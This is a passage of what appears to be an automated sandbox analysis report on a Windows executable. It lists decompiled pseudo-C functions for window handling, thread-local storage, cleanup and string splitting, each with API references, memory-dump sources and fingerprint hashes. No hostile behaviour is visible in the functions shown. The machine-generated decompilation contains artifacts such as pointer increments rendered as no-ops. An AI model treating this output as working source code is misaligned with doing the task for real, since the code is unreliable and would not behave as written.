						 *((char*)(_t25 + 9)) = 1;
						EnableWindow(_t23, 0);
					}
				}
				return 1;
			}






                                                                                                                                                                      0x004094aa
                                                                                                                                                                      0x004094b1
                                                                                                                                                                      0x004094c3
                                                                                                                                                                      0x004094dc
                                                                                                                                                                      0x004094e0
                                                                                                                                                                      0x004094e9
                                                                                                                                                                      0x004094ec
                                                                                                                                                                      0x004094f8
                                                                                                                                                                      0x004094fa
                                                                                                                                                                      0x004094fa
                                                                                                                                                                      0x00409506
                                                                                                                                                                      0x00409515
                                                                                                                                                                      0x00409519
                                                                                                                                                                      0x00409519
                                                                                                                                                                      0x00409506
                                                                                                                                                                      0x00409525

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004094BF
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004094C6
                                                                                                                                                                        • Part of subcall function 0040DB12: HeapAlloc.KERNEL32(00000008,00000000,0040D38C,00417608,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB1E
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004094E3
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 004094F0
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 004094FE
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00409509
                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00409519
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3383493704-0
                                                                                                                                                                      • Opcode ID: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
                                                                                                                                                                      • Instruction ID: d72cecd996af7503d4a55556d0eaf5d1fe8b6ec4fae3718c35eb9c11583601b7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
                                                                                                                                                                      • Instruction Fuzzy Hash: B10175312043016ED3215B79AC88AAB7AE8EF95754B15803EF545E31A6DB74DC01C669
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408E54, Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                      			E00408E54(struct HWND__* _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				long _t20;
				WCHAR* _t22;
				int _t33;

				_t10 = _a8;
				if(_t10 == 0) {
					UnregisterClassW( *0x416114,  *0x41700c);
					 *0x4170c8 = 1;
				} else {
					_t13 = _t10 - 0xe;
					if(_t13 == 0) {
						L6:
						E00409292();
						DestroyWindow(_a4);
					} else {
						if(_t13 != 0x101) {
							return DefWindowProcW();
						}
						_t19 = (_a12 & 0x0000ffff) - 0x3e8;
						if(_t19 == 0) {
							_t20 = GetWindowLongW(_a4, 0xffffffeb);
							_t5 = GetWindowTextLengthW( *0x4170d0) + 1; // 0x1
							_t33 = _t5;
							_t22 = HeapAlloc( *0x417008, 0, _t33 + _t33);
							 *_t20 = _t22;
							GetWindowTextW( *0x4170d0, _t22, _t33);
							E00409292();
							DestroyWindow(_a4);
						} else {
							if(_t19 == 1) {
								goto L6;
							}
						}
					}
				}
				return 0;
			}









                                                                                                                                                                      0x00408e5b
                                                                                                                                                                      0x00408e5c
                                                                                                                                                                      0x00408ef3
                                                                                                                                                                      0x00408ef9
                                                                                                                                                                      0x00408e62
                                                                                                                                                                      0x00408e62
                                                                                                                                                                      0x00408e65
                                                                                                                                                                      0x00408e85
                                                                                                                                                                      0x00408e85
                                                                                                                                                                      0x00408e8d
                                                                                                                                                                      0x00408e67
                                                                                                                                                                      0x00408e6c
                                                                                                                                                                      0x00408e6f
                                                                                                                                                                      0x00408e6f
                                                                                                                                                                      0x00408e7b
                                                                                                                                                                      0x00408e80
                                                                                                                                                                      0x00408e9c
                                                                                                                                                                      0x00408eb0
                                                                                                                                                                      0x00408eb0
                                                                                                                                                                      0x00408ebf
                                                                                                                                                                      0x00408ecd
                                                                                                                                                                      0x00408ecf
                                                                                                                                                                      0x00408ed5
                                                                                                                                                                      0x00408edd
                                                                                                                                                                      0x00408e82
                                                                                                                                                                      0x00408e83
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408e83
                                                                                                                                                                      0x00408e80
                                                                                                                                                                      0x00408e65
                                                                                                                                                                      0x00408f06

                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00408E8D
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00408E9C
                                                                                                                                                                      • GetWindowTextLengthW.USER32 ref: 00408EAA
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00408EBF
                                                                                                                                                                      • GetWindowTextW.USER32 ref: 00408ECF
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00408EDD
                                                                                                                                                                      • UnregisterClassW.USER32 ref: 00408EF3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2895088630-0
                                                                                                                                                                      • Opcode ID: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
                                                                                                                                                                      • Instruction ID: f973f4e0a74c58c8f3dc6b35f62902cd2ce24d79b6cf0357400b1c80f0f6dd69
                                                                                                                                                                      • Opcode Fuzzy Hash: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
                                                                                                                                                                      • Instruction Fuzzy Hash: 5011CE3100821AFBCB116F64FD0C9AA3F66EB18395B11C03AF949A22F4DA799951DB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409528, Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00409528(long _a4) {
				int _t11;
				long _t12;
				int _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				if(_a4 == 0) {
					_t22 =  *0x4170e4; // 0x0
					if(_t22 != 0) {
						do {
							_t16 =  *_t22;
							_t6 = _t22 + 8; // 0x8
							_t25 = _t6;
							_t12 = GetCurrentThreadId();
							if( *_t6 == _t12) {
								if( *((char*)(_t22 + 0x11)) != 0) {
									EnableWindow( *(_t22 + 0xc), 1);
								}
								if( *((char*)(_t22 + 0x10)) != 0) {
									SetWindowPos( *(_t22 + 0xc), 0xffffffff, 0, 0, 0, 0, 3);
								}
								_t12 = E0040DAD2(0x4170e4, _t25);
							}
							_t22 = _t16;
						} while (_t16 != 0);
						return _t12;
					}
				} else {
					_t11 = EnumWindows(E004094A7, _a4);
					_t23 =  *0x4170e4; // 0x0
					if(_t23 != 0) {
						do {
							_t17 =  *_t23;
							_t15 = GetCurrentThreadId();
							if( *((intOrPtr*)(_t23 + 8)) == _t15 &&  *((char*)(_t23 + 0x10)) != 0) {
								_t15 = SetWindowPos( *(_t23 + 0xc), 0xfffffffe, 0, 0, 0, 0, 3);
							}
							_t23 = _t17;
						} while (_t17 != 0);
						return _t15;
					}
				}
				return _t11;
			}










                                                                                                                                                                      0x00409530
                                                                                                                                                                      0x0040957d
                                                                                                                                                                      0x00409585
                                                                                                                                                                      0x0040958a
                                                                                                                                                                      0x0040958a
                                                                                                                                                                      0x0040958c
                                                                                                                                                                      0x0040958c
                                                                                                                                                                      0x0040958f
                                                                                                                                                                      0x00409598
                                                                                                                                                                      0x0040959e
                                                                                                                                                                      0x004095a5
                                                                                                                                                                      0x004095a5
                                                                                                                                                                      0x004095af
                                                                                                                                                                      0x004095bc
                                                                                                                                                                      0x004095bc
                                                                                                                                                                      0x004095c8
                                                                                                                                                                      0x004095ce
                                                                                                                                                                      0x004095cf
                                                                                                                                                                      0x004095d1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004095d5
                                                                                                                                                                      0x00409532
                                                                                                                                                                      0x0040953b
                                                                                                                                                                      0x00409541
                                                                                                                                                                      0x00409549
                                                                                                                                                                      0x00409551
                                                                                                                                                                      0x00409551
                                                                                                                                                                      0x00409553
                                                                                                                                                                      0x0040955c
                                                                                                                                                                      0x0040956f
                                                                                                                                                                      0x0040956f
                                                                                                                                                                      0x00409575
                                                                                                                                                                      0x00409577
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409551
                                                                                                                                                                      0x00409549
                                                                                                                                                                      0x004095d9

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumWindows.USER32(004094A7,?), ref: 0040953B
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00409553
                                                                                                                                                                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040956F
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040958F
                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 004095A5
                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2527101397-0
                                                                                                                                                                      • Opcode ID: ce8455a101d240a02109509219b5cc618f809e6c491c4b9dbe06f1833ead8f36
                                                                                                                                                                      • Instruction ID: f5bff55c5df6c6442a3445df2da52706b8c810d9f19cb65a9eb7b3fa66b57753
                                                                                                                                                                      • Opcode Fuzzy Hash: ce8455a101d240a02109509219b5cc618f809e6c491c4b9dbe06f1833ead8f36
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A11AC32609351BBD7324B17EC08F53BBA9AB81B21F15863EF456221E1DB759D00C618
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D2F3, Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                      			E0040D2F3(long _a4, long _a8, long _a12) {
				long _t7;
				long _t8;
				long* _t12;
				void* _t18;
				long _t21;
				signed int _t23;
				long _t28;
				long _t29;
				long _t30;
				void* _t31;

				_t29 = _a4;
				_t23 = _t29 & 0x00000003;
				if(_t23 != 0) {
					_t18 = 4;
					_t29 = _t29 + _t18 - _t23;
				}
				_t7 =  *0x41760c; // 0x10
				if(_t7 == 0) {
					 *0x417610 = TlsAlloc();
					TlsSetValue( *0x417610, HeapAlloc( *0x417008, 8, _t29));
					_t7 =  *0x41760c; // 0x10
				}
				_t28 = _t7;
				_t8 = _t7 + _t29;
				 *0x41760c = _t8;
				_t31 = HeapReAlloc( *0x417008, 8, TlsGetValue( *0x417610), _t8);
				TlsSetValue( *0x417610, _t31);
				_t30 = _a8;
				_t21 = _a12;
				if(_t30 != 0 || _t21 != 0) {
					_t12 = E0040DB12(0x417608, 0x14);
					 *_t12 = _t28;
					_t12[1] = _t30;
					_t12[2] = _t21;
					if(_t30 != 0) {
						 *_t30(_t31 + _t28);
					}
				}
				return _t28;
			}













                                                                                                                                                                      0x0040d2f6
                                                                                                                                                                      0x0040d2fd
                                                                                                                                                                      0x0040d300
                                                                                                                                                                      0x0040d304
                                                                                                                                                                      0x0040d307
                                                                                                                                                                      0x0040d307
                                                                                                                                                                      0x0040d309
                                                                                                                                                                      0x0040d316
                                                                                                                                                                      0x0040d327
                                                                                                                                                                      0x0040d339
                                                                                                                                                                      0x0040d33b
                                                                                                                                                                      0x0040d33b
                                                                                                                                                                      0x0040d340
                                                                                                                                                                      0x0040d342
                                                                                                                                                                      0x0040d34b
                                                                                                                                                                      0x0040d365
                                                                                                                                                                      0x0040d36e
                                                                                                                                                                      0x0040d370
                                                                                                                                                                      0x0040d374
                                                                                                                                                                      0x0040d37a
                                                                                                                                                                      0x0040d387
                                                                                                                                                                      0x0040d38e
                                                                                                                                                                      0x0040d390
                                                                                                                                                                      0x0040d393
                                                                                                                                                                      0x0040d398
                                                                                                                                                                      0x0040d39e
                                                                                                                                                                      0x0040d3a0
                                                                                                                                                                      0x0040d398
                                                                                                                                                                      0x0040d3a7

                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D318
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D32C
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D339
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D350
                                                                                                                                                                      • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D35F
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D36E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocValue$Heap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2472784365-0
                                                                                                                                                                      • Opcode ID: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
                                                                                                                                                                      • Instruction ID: 9f859b01fecb640b0c0eeeefa64339d4fa0418cdbc8b4e3825918bdf59145f1e
                                                                                                                                                                      • Opcode Fuzzy Hash: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 76116072B44710AFD7119FA9EC48AA67BB9FB48760B05843AFA04D33A0D7359C048B6C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00411CE4, Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                      			E00411CE4(void* _a4) {
				void* _t11;
				long _t16;
				void _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t19 = _a4;
				__imp__UnregisterWait( *((intOrPtr*)(_t19 + 0xc)));
				CloseHandle( *(_t19 + 0x10));
				EnterCriticalSection(0x417680);
				_t17 =  *_t19;
				_t11 =  *(_t19 + 4);
				if(_t17 == 0) {
					 *0x41767c = _t11;
				} else {
					 *(_t17 + 4) = _t11;
				}
				_t18 =  *(_t19 + 4);
				if(_t18 != 0) {
					 *_t18 =  *_t19;
				}
				LeaveCriticalSection(0x417680);
				_t16 =  *(_t19 + 8);
				while(_t16 != 0) {
					_t21 = _t16;
					_t16 =  *_t16;
					 *((intOrPtr*)(_t21 + 4))( *((intOrPtr*)(_t21 + 8)));
					HeapFree( *0x417008, 0, _t21);
				}
				return HeapFree( *0x417008, _t16, _t19);
			}









                                                                                                                                                                      0x00411ce7
                                                                                                                                                                      0x00411cee
                                                                                                                                                                      0x00411cf7
                                                                                                                                                                      0x00411d03
                                                                                                                                                                      0x00411d09
                                                                                                                                                                      0x00411d0b
                                                                                                                                                                      0x00411d10
                                                                                                                                                                      0x00411d17
                                                                                                                                                                      0x00411d12
                                                                                                                                                                      0x00411d12
                                                                                                                                                                      0x00411d12
                                                                                                                                                                      0x00411d1c
                                                                                                                                                                      0x00411d21
                                                                                                                                                                      0x00411d25
                                                                                                                                                                      0x00411d25
                                                                                                                                                                      0x00411d28
                                                                                                                                                                      0x00411d2e
                                                                                                                                                                      0x00411d4c
                                                                                                                                                                      0x00411d33
                                                                                                                                                                      0x00411d35
                                                                                                                                                                      0x00411d3a
                                                                                                                                                                      0x00411d46
                                                                                                                                                                      0x00411d46
                                                                                                                                                                      0x00411d61

                                                                                                                                                                      APIs
                                                                                                                                                                      • UnregisterWait.KERNEL32(?), ref: 00411CEE
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00411E6A,?), ref: 00411CF7
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00417680,?,?,?,00411E6A,?), ref: 00411D03
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00417680,?,?,?,00411E6A,?), ref: 00411D28
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,00411E6A,?), ref: 00411D46
                                                                                                                                                                      • HeapFree.KERNEL32(?,?,?,?,?,00411E6A,?), ref: 00411D58
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4204870694-0
                                                                                                                                                                      • Opcode ID: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
                                                                                                                                                                      • Instruction ID: 8f9f96d7996d446dd79b7cbdc6e3cce5d3da35cfe841f16b8799e142d118698f
                                                                                                                                                                      • Opcode Fuzzy Hash: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
                                                                                                                                                                      • Instruction Fuzzy Hash: 6B012574202601BFCB119F15FD88A96BB79FF493513118139E61A87630C735AC51CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004057F0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004057F0(void* __ebx, void* __edi, void* __esi, wchar_t* _a4, intOrPtr _a8, wchar_t* _a12, intOrPtr _a16) {
				wchar_t* _v4;
				void* __ecx;
				signed int _t25;
				signed int _t26;
				void* _t27;
				long _t33;
				int _t34;
				wchar_t* _t36;
				wchar_t* _t38;
				int _t40;
				void* _t41;
				wchar_t* _t42;
				intOrPtr _t44;
				long* _t45;
				void* _t47;
				void* _t48;
				wchar_t* _t51;
				wchar_t* _t52;
				wchar_t* _t53;
				int _t55;
				void* _t60;

				_t44 = _a8;
				_t55 = 0;
				if(_t44 < 1) {
					return E0040E2A0(_t41, _a16);
				} else {
					_t51 = _a4;
					if(_t51 == 0) {
						_t51 = 0x412024;
					}
					_t42 = _a12;
					if(_t42 == 0) {
						_t42 = 0x412024;
						_a12 = 0x412024;
					}
					_t25 =  *_t42 & 0x0000ffff;
					_t47 = 0;
					_v4 = _t25;
					_t36 = _t51;
					_a4 = _t36;
					if(_t25 == 0 || _t42[0] == 0) {
						_t42 = _v4;
						while(1) {
							_t26 =  *_t51 & 0x0000ffff;
							if(_t26 == _t42 || _t26 == 0) {
								goto L20;
							}
							L23:
							_t51 =  &(_t51[0]);
							continue;
							L20:
							_t47 = _t47 + 1;
							if(_t47 == _t44) {
								_t55 = _t51 - _t36 >> 1;
							} else {
								if(_t26 != 0) {
									_t17 =  &(_t51[0]); // 0x0
									_t36 = _t17;
									goto L23;
								}
							}
							goto L26;
						}
					} else {
						_t38 = _t42;
						_t8 =  &(_t38[0]); // 0x412026
						_t45 = _t8;
						do {
							_t33 =  *_t38;
							_t38 =  &(_t38[0]);
						} while (_t33 != 0);
						_t40 = _t38 - _t45 >> 1;
						while(1) {
							L10:
							_t34 = wcsncmp(_t51, _t42, _t40);
							_t60 = _t60 + 0xc;
							if(_t34 != 0 &&  *_t51 != _t55) {
								break;
							}
							_t47 = _t47 + 1;
							if(_t47 == _a8) {
								_t36 = _a4;
								_t55 = _t51 - _t36 >> 1;
							} else {
								if( *_t51 == _t55) {
									_t36 = _a4;
								} else {
									_t42 = _a12;
									_t51 = _t51 + _t40 * 2;
									_a4 = _t51;
									continue;
								}
							}
							goto L26;
						}
						_t42 = _a12;
						_t51 =  &(_t51[0]);
						goto L10;
					}
					L26:
					_t27 = E0040E180(_t42, _t51);
					_t52 = _a12;
					_t48 = _t27;
					if(_t48 != 0) {
						memmove(E0040E1D0(_t42, _t52), _t36, _t55 * 2);
						_t60 = _t60 + 0xc;
					}
					_t53 = E0040E200(_t55, _t52);
					if(_t48 == 0) {
						wcsncpy(_t53, _t36, _t55);
					}
					 *((short*)(_t53 + _t55 * 2)) = 0;
					return 0;
				}
			}
























                                                                                                                                                                      0x004057f1
                                                                                                                                                                      0x004057f6
                                                                                                                                                                      0x004057fb
                                                                                                                                                                      0x0040591a
                                                                                                                                                                      0x00405801
                                                                                                                                                                      0x00405803
                                                                                                                                                                      0x0040580a
                                                                                                                                                                      0x0040580c
                                                                                                                                                                      0x0040580c
                                                                                                                                                                      0x00405811
                                                                                                                                                                      0x00405817
                                                                                                                                                                      0x00405819
                                                                                                                                                                      0x0040581e
                                                                                                                                                                      0x0040581e
                                                                                                                                                                      0x00405822
                                                                                                                                                                      0x00405825
                                                                                                                                                                      0x00405827
                                                                                                                                                                      0x0040582b
                                                                                                                                                                      0x0040582d
                                                                                                                                                                      0x00405834
                                                                                                                                                                      0x00405892
                                                                                                                                                                      0x00405896
                                                                                                                                                                      0x00405896
                                                                                                                                                                      0x0040589c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058b0
                                                                                                                                                                      0x004058b0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058a3
                                                                                                                                                                      0x004058a3
                                                                                                                                                                      0x004058a6
                                                                                                                                                                      0x004058b9
                                                                                                                                                                      0x004058a8
                                                                                                                                                                      0x004058ab
                                                                                                                                                                      0x004058ad
                                                                                                                                                                      0x004058ad
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058ad
                                                                                                                                                                      0x004058ab
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004058a6
                                                                                                                                                                      0x0040583c
                                                                                                                                                                      0x0040583c
                                                                                                                                                                      0x0040583e
                                                                                                                                                                      0x0040583e
                                                                                                                                                                      0x00405841
                                                                                                                                                                      0x00405841
                                                                                                                                                                      0x00405844
                                                                                                                                                                      0x00405847
                                                                                                                                                                      0x0040584e
                                                                                                                                                                      0x00405850
                                                                                                                                                                      0x00405850
                                                                                                                                                                      0x00405853
                                                                                                                                                                      0x00405858
                                                                                                                                                                      0x0040585d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040586d
                                                                                                                                                                      0x00405872
                                                                                                                                                                      0x00405886
                                                                                                                                                                      0x0040588e
                                                                                                                                                                      0x00405874
                                                                                                                                                                      0x00405877
                                                                                                                                                                      0x004058bd
                                                                                                                                                                      0x00405879
                                                                                                                                                                      0x00405879
                                                                                                                                                                      0x0040587d
                                                                                                                                                                      0x00405880
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405880
                                                                                                                                                                      0x00405877
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405872
                                                                                                                                                                      0x00405864
                                                                                                                                                                      0x00405868
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405868
                                                                                                                                                                      0x004058c1
                                                                                                                                                                      0x004058c2
                                                                                                                                                                      0x004058c7
                                                                                                                                                                      0x004058cb
                                                                                                                                                                      0x004058cf
                                                                                                                                                                      0x004058e1
                                                                                                                                                                      0x004058e6
                                                                                                                                                                      0x004058e6
                                                                                                                                                                      0x004058f0
                                                                                                                                                                      0x004058f4
                                                                                                                                                                      0x004058f9
                                                                                                                                                                      0x004058fe
                                                                                                                                                                      0x00405904
                                                                                                                                                                      0x0040590c
                                                                                                                                                                      0x0040590c

                                                                                                                                                                      APIs
